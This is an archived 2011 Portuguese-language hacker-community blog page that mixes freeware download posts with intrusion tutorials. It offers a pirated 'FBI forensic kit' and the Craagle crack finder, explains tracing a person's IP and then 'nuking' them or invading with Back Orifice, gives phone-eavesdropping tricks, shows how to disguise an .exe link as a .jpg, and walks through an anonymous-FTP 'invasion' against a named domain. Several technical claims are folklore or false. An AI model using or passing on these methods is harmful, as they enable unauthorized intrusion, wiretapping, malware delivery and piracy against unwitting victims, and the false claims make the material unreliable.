Boa vindas

BEM VINDOS
A comunidade hacker's escola do futuro é uma comunidade que foi criada com o objetivo de compartilhar informações e conhecimentos do mundo virtual.
O objetivo maior desse blog é facilitar a vida de todos os nossos membros e usuários da rede que desejam aprender um pouco mais sobre esse mundo que vem crescendo cada vez mais.
Aproveitem!


Noticias:

quinta-feira, 28 de abril de 2011

Kit de Ferramentas do FBI



Download   Kit de Ferramentas do FBI


FBI Forensic Field Kit  Ferramentas Bootable Forense
Um dos Melhores senão o kit hacker ja Melhor Liberado, kit hacker Esse disponabiliza Programas Proibidos Foi Liberado hacker dark fbi Pelo Ele invadiu o Servidor fazer Todas fbi buscou fontes de instação dos Programas Que o fbi E.U.A.! n Indispensavel Quem UM TEM ja Pouco de Conhecimento e deseja se Tornar UM hacker. 

Ferramenta Forensics:

Sleuth Kit Kit-Forensics
Py-Flag - Forensics Browser
Autopsy - Forensics Browser para Sleuth Kit
DCFLdd - Imaging DD Tool ferramenta de linha de comando e também funciona com AIR
lugar - Dados Carver ferramenta de linha de comando
Air - Forensics GUI Imaging
md5deep - MD5 hash Programa
netcat - Command Line
cryptcat - Command Line
NTFS-Tools 
qtparted - GUI ferramenta de particionamento
regviewer - Windows Registry Viewer
X-Ways WINTRACE
X-Ways WinHex
X-Ways Forense
R-Studio Emergência (mídia inicializável de recuperação Maker)
R-Studio Network Edtion
R-Studio Agent RS
residente Net
Faces 3 Full (600 megas)
Encase 4,20
Kit de Manuais de Campo 
Resposta a Incidentes - Computer Forensics
Computador investigação criminal
Patologia Forense
Internet Forensics
Forense interpretação das provas
Windows Forensics
Computação Forense-Um Dicionário Ilustrado
Computer Forensics - jumpstart
Programas ADICIONAIS Boot DVD: 
Gentoo Linux 2.6 Kernel - Opyimized para Uso Forense
XFCE - GUI
Apache2 - Servidor
Mysql PHP4
Open Office
Gimp - Programa Graphics
KSnapshot - Programa de captura de tela
Mozilla 
Gnome CD Master
K3b - CD Burner
XMMS - media player
Vigia - Gentoo Gerenciador de Pacotes Gráficos
Karchiver - GUI GZIP
Ferramentas de segurança:
Etherape - Traffic Network Monitor GUI
Clamv - Anti Virus
snort - Command Line
John the Ripper - Command Line cracker senha
rkhunter - Command Line
Ethereal - Analisador de Tráfego de Rede
Fwbuilder - App Firewall GUI
nessus - scanner de rede


Tudo Full!

Tamanho: 1.38GB
Idioma: Inglês


terça-feira, 19 de abril de 2011

Microsoft Safety Scanner 1.0



O Microsoft Safety Scanner é um programa distribuído gratuitamente pela Microsoft que realiza uma busca completa em seu computador a fim de localizar e eliminar ameaças como vírus e malwares. Além de ser bem fácil de utilizar, a ferramenta não requer nenhum tipo de instalação. Tudo o que você precisa fazer é executar o arquivo baixado e seguir as instruções.

Download

Weeny Free Video Conversor 1.1


Converter vídeos para outros formatos não é uma tarefa difícil, e por vezes isso é muito necessário. Muitos editores e players multimídia não rodam determinados formatos de arquivo, e, nesses casos, a solução é buscar um conversor e realizar a mudança.
O Weeny Free Video Conversor é um aplicativo que facilita esse processo, tornando-o muito mais rápido e eficaz. Ele consegue ler a maior parte dos formatos disponíveis no mercado, como AVI, MP4, 3GP, RMVB, VOB, MPG, FLV, entre outros.

Download

Panda USB and AutoRun Vaccine 1.0


Não é difícil encontrar alguém que já tenha tido problemas com o “autorun” de pendrives e de outros equipamentos portáteis de armazenamento. Esse arquivo é responsável por executar automaticamente dispositivos USB e, justamente por essa função, é alvo constante de infecção por malwares.
Para garantir que tanto o computador quanto o dispositivo portátil estejam livres da ação de arquivos maliciosos, nada melhor do que uma vacina. Uma das boas opções disponíveis atualmente é o Panda USB and AutoRun Vaccine, pois ele trabalha para imunizar seus equipamentos.

Download

quarta-feira, 13 de abril de 2011

Retirar manualmente um Cavalo de Tróia

Quando os Antivírus Falham. Como podemos Retirar manualmente um Cavalo de Tróia (Trojan) do Windows XP ou Vista sem precisar de ferramentas do tipo Disco de Boot?


1º Passo - Tecle Ctrl + Ald + Del, depois clique em Geranciador de Tarefas, e verifique a existência do trojan em execução. Normalmente só é exibido ele na janela que mostra os aplicativos em execução.

2º Passo - Clique em Iniciar, depois clique em Executar e digite: msconfig, depois clique em OK, vá até a Guia Inicializar, e procure arquivos com nomes extranhos que fica neste caminho, C:\WINDOWS ou C:\WINDOWS\SYSTEM32 , normalmente, os vírus trojans ficam na pasta system32, mas eles podem ficar alojados em outras pastas do windows. A melhor maneira de ter essa certeza, é instalar um bom antivírus, e scanear a sua máquina para que eles detectem, daí quando ele encontrar o vírus, anote imediatamente o caminho e o nome do arquivo. Os antivírus conseguem detectar, mais eles não conseguem eliminar, pois estes vírus são protejidos e ocultos. Alguns antivírus executam a verificação antes de entrar no Sistema Operacional onde poderia ser possível a eliminação, mas muitos deles falham.




3º Passo - Agora que você já sabe o caminho e o nome do arquivo executável (que é o nosso cavalo de tróia), para eliminar, reinicie sua máquina, e após passar a mensagem que pede para entrar  no setup, mantenha a tecla F8 pressionada até exibir um Menu de opções numa tela preta.

4º Passo - Entre na opção que fala sobre (Modo Seguro em Prompt de Comando passo a passo). Ele vai entrar numa janela DOS onde você terá de ter conhecimento dos comandos do MS-DOS para operar. Clique aqui para você ter uma pequena noção sobre os comandos do MS-DOS.

5º Passo - Digite: CD\WINDOWS\SYSTEM32 , depois tecle Enter. Agora que estamos na pasta ou diretório System32, vamos listar o arquivo OLESVI.EXE que é o nome do nosso trojan, você pode fazer o mesmo com o seu trojan. Basta digitar:DIR  /A  OLESVI.EXE . Digite também DIR  /A OLESVI*.DLL para ver se existem também arquivos (.DLL) que acompanham este trojan. Observação: Você pode depois digitar este comando DIR ?  para visualizar todos os parâmetros que pode ser usados com o comandos DIR
.
6º Passo - Digite DEL  /A  /F  OLESVI.EXE ,  o arquivo executável foi eliminado. Se no passo 5º você encontrou arquivos com o mesmo nome e com a extenção .DLL , faça o mesmo, apague-o. Para ter certeza se apagou, use novamente o comando DIR.

7º Passo - Tecle Ctrl + Alt + Del, depois clique em Desligar. Ligue novamente seu PC. Após entrar no windows, repita o passo 2, e veja que o caminho que chama o trojan ainda está lá, mas não se preocupe, pois este é apenas um registro em aberto, e você pode remove-lo pelo regedit, antes de vermos isto, desmarque o quadradinho que fica ao pado do caminho que chama o trojan, (Veja a figura acima).

8º Passo - Existem aplicativos que limpam os registros abertos do windows, mas se você não têm então vamos lmpar manualmente. Clique em Iniciar, depois executar, digite: regedit, após abrir o registro do windows, Tecle Ctrl + F e digite o nome OLESVI.EXE que é o nome do nosso trojan em exercício. Clique no botão Localizar Próxima. Quando aparecer ao lado o nome OLESVI.EXE, na primeira coluna Nome, clique com o botão direito do mouse e clique em Excluir. (Não tenha medo!) Depois vá teclando sempre F3 no teclado para localizar o próximo registro com este mesmo nome, e vá sempre excluindo.



ESPERO TER AJUDADO

segunda-feira, 11 de abril de 2011

Skype 5.2.60.113



Hoje em dia, muitos programas permitem que o usuário faça ligações pela internet. Até mesmo mensageiros populares como o Windows Live Messenger são capazes de proporcionar ao usuário ligações e chamadas em vídeo. No entanto, se existe um programa que se tornou sinônimo de ligação gratuita na web, esse aplicativo é o Skype.
Com visual renovado, novos recursos e integração com redes sociais, o Skype 5 promete conquistar uma boa fatia de mercado, em especial o público corporativo, que passa contar com um recurso exclusivo de videoconferência em grupos. Ou seja, você poderá falar e visualizar diversas pessoas ao mesmo tempo, desde que todos eles tenham a mesma versão do aplicativo.

Download

Plan Your Room



O Plan Your Room é uma excelente alternativa para quem deseja elaborar o projeto básico da estrutura e decoração de imóveis, sem a preocupação de instalar nada. Este serviço online permite a criação de plantas fantásticas, com a vantagem de não pesar no navegador.
Levante paredes, instale portas ou janelas e carregue móveis sem fazer esforço. Use este aplicativo e planeje a casa dos seus sonhos como se fosse um arquiteto ou decorador profissional!


Link

SPlayer 3.6 Build 1975



Ao escolher um programa para se tornar o player de vídeos padrão do computador, é necessário levar em consideração três fatores: a forma com que os comandos disponíveis são apresentados ao usuário, se é necessária ou não a instalação de um pacote de codecs adicionais e, o mais importante, o quanto o programa exige da capacidade do computador utilizado.
Infelizmente, a maioria dos casos que reúnem as duas primeiras características fazem isso ao custo da terceira, o que resulta em softwares bonitos e fáceis de usar, mas que precisam de um bom computador para isso. O SPlayer é uma grata surpresa em meio a este cenário, oferecendo ao usuário uma série de opções de reprodução diferentes ao mesmo tempo em que exige muito pouco do computador.


Download

terça-feira, 5 de abril de 2011

Descobrindo o poder do Ms-dos



Bom meus queridos vizitantes hj nessa tarde de Domingo dia 11 nós tomamos coragem e atualizamos o site com algumas coisas novas do vosso interesse quero que vc si divirta-se quebrando a proteção de alguns modens atráves do Ms de comando


Invadindo por IP-TCP


Todo mundo que tem o ms-dos instalado em seu computador, por isso, quase todo
mundo,

não sabe que tem um potente rastreador de endereço IP em sua
máquina.

Mas antes de tudo o que é endereço ip? Endereço IP é um
número que você recebe na

hora em que conecta ao seu servidor. Um exemplo de endereço IP é 200.200.200.200.
Os

três primeiros números representam o D.N.S. de seu servidor, e
o último o número que

varia. No Brasil, todos os IPs começam com 200.

Para rastrear você deve usar um programa chamado arp, que faz parte do
ms-dos. O

comando que deve ser digitado é arp -a. Você verá uma lista
de endereços IP. Mas como

saber qual é o IP da pessoa? Você deve ter certeza de que a última
informação que

chegou no seu modem veio da pessoa que você quer descobrir o IP, e daí entrar
com o

comando no prompt do ms-dos. O IP da pessoa será o primeiro.

Também existem outros programas como o netstat. Com ele você pode
rastrear qual é o

servidor da pessoa e outros. Mas esse programa é mais complicado, se
você quer saber

como usá-lo digite netstat -h , e a tela de ajuda aparece.

O que fazer com o endereço IP? Você pode nukar a pessoa. O nuke é um
programa que

envia uma mensagem de erro a porta 139, fazendo a conexão da vítima
cair. Você também

pode invadir o computador da pessoa usando o Back Orifice ou outro programa.



Cuidado, seu host e seu ip foram rastreados:

4 maneiras de rastrear chamadas de celular

Aviso: Escuta clandestina é um crime previsto por lei e da cana! Por isso aprenda a correr seus riscos, eu não me responsabilizo por nemhum de seus atos.

Ultilizando aparelhos motorola.

Primeiro tire a bateria do seu celular , depois de abrir o celular ira ter umas partes de metal embaixo do celular ,Três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal ,depois bote a bateria ,e ligue o celular, ira acontecer umas coisas , digite #1008# e depois de digitar o numero é só ouvir as conversas telefônicas.

Ultilizando aparelhos Ericson.

1 - Pressione a tecla FCN e com ela pressionada apertar os números 90- 40- 59.
2 - Solte a tecla FCN. Deverá aparecer na tela a mensagem TESTE INPUT.
3 – Aperte então 1 * 1 # 01 # #.
4 - Pronto, você entrou no canal 01, para ir mudando de canais basta ir apertando a tecla de volume até achar alguma conversa interessante.
5 - Para tirar do modo de escuta, você deve retirar a bateria do celular.

Ultilizando aparelhos de televisão.

Este texto contém informações consideráveis que ensinam como fazer escuta celular
via TV(pode se necessário usar o manual da TV). Nos avisamos que fazer escuta
celular é ilegal de acordo com a ECPA, e estas informações são exclusivamente para
uso e propósito educacional não nos responsabilizamos pelo mal uso das
informações aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer
a escuta. Cada canal da TV obrigara 5Mhz com ótimo controle de sintonia. Se
mesmo assim você não tiver uma freqüência exata você precisará ler sobre
freqüência e você terá uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você
pegara alguma coisa. Você poderá também pegar transmissões de negócios no
tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a
menos que a conversa esteja codificada então você poderá usar a velha TV para
achar outro local de negócios que use freqüências entre 800Mhz ou mais.

Ultilizando um rádio comum.

Os telefones em questão, são telefones sem fio. Eles transmitem suas ondas por
FM. Sendo assim, o que você tem que fazer é descobrir a freqüência. Mas, tem as
suas restrições. À não ser que seja um rádio com uma antena muito forte, ele tem
que ficar perto da base do telefone. Uma freqüência que descobri é 93,9MHz, mas
não quer dizer que todas sejam assim. E não é ligar apenas ligar o rádio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto
exato, você poderá escutar perfeitamente.

CAMUFLA VIRUS EM ENDEREÇOS

Ola pessoal
eu recebi um link muito estranho do meu amigo
ele me passo para eu ver, ele tmb acho estranho

Código:

http://www.dfold.net/zeroboard/fotos.exe#/fotolog/fotosacidentes_ontem/fotos.jpg


ai comecei a estudar o link

como vcs podem perceber existe um sinal de "#"

e cliquei na minha maquina virtual so que o link acima esta quebrado.

intow como eu sou curioso peguei um .exe e comecei a colocar uns codigos
e acabei achando uma coisa legal

Código:

http://pwp.netcabo.pt/0176170301/down/elifoot2007pt2.exe#/fotolog/img.jpg

O link acima é o

jogo
Elifoot 2007, mais porem olhem que o final esta
".jpg"
nao preciso dizer mais nada né ?

criatividade esta ai para usar e abusar ...

INVADINDO SERVIDORES FTP

Introdução

Essa bug tem em quase todos os server's ftp, mas no ftp vc pode ser descoberto
em 15 segundos(ou não)!



Códigos

Vamos usar esses códigos:

quote user ftp

quote cwd ~root

quote pass ftp



Go!

Primeiro abra o CMD e digite ftp

então digite open sua vitima ex: open pspiso.com

em nome de user e senha aperte enter

vai dar falha no login então digite

quote user ftp


e digite quote cwd ~root

e então quote pass ftp


Pronto você esta dentro agora sem feichar o CMD abra o Internet Explorer

e digite
ftp://vitima pra
mim ficou
ftp://pspiso.com
e transfira o que vc quiser.

domingo, 3 de abril de 2011

BestPractice 1.03


BestPractice é o software (em português) ideal para quem está aprendendo a tocar, seja qual for o instrumento musical, suas canções favoritas. Ele é capaz de diminuir/aumentar o andamento da música para você ouvir as notas ou até mesmo tocá-las simultaneamente com o seu instrumento preferido, por exemplo.

Atualmente existem vários softwares de áudio desenvolvidos para auxiliar e ensinar alunos de música, contudo a grande maioria é focada na parte teórica ou técnica, como por exemplo, o Guitar Pro — programa pago capaz de exibir as notas para vários instrumentos. Já BestPractice tem outro foco: é ótimo para quem gosta de tirar músicas de ouvido ou tocar juntamente da música, alterando a velocidade das passagens.

Download

Craagle V4.0 Final


O Craagle é um software que possui como principal funcionalidade, pesquisar por seriais e cracks de programas pagos Craagle é um programa para a busca automatizada de números de série e geradores de chaves para inúmero software e aplicações, disponibilizando uma busca rápida e fácil.
Suporta configuração de proxy.

Download

<<<< Identificador >>>>

VC FOI DETECTADO, PARABÉNS!!!!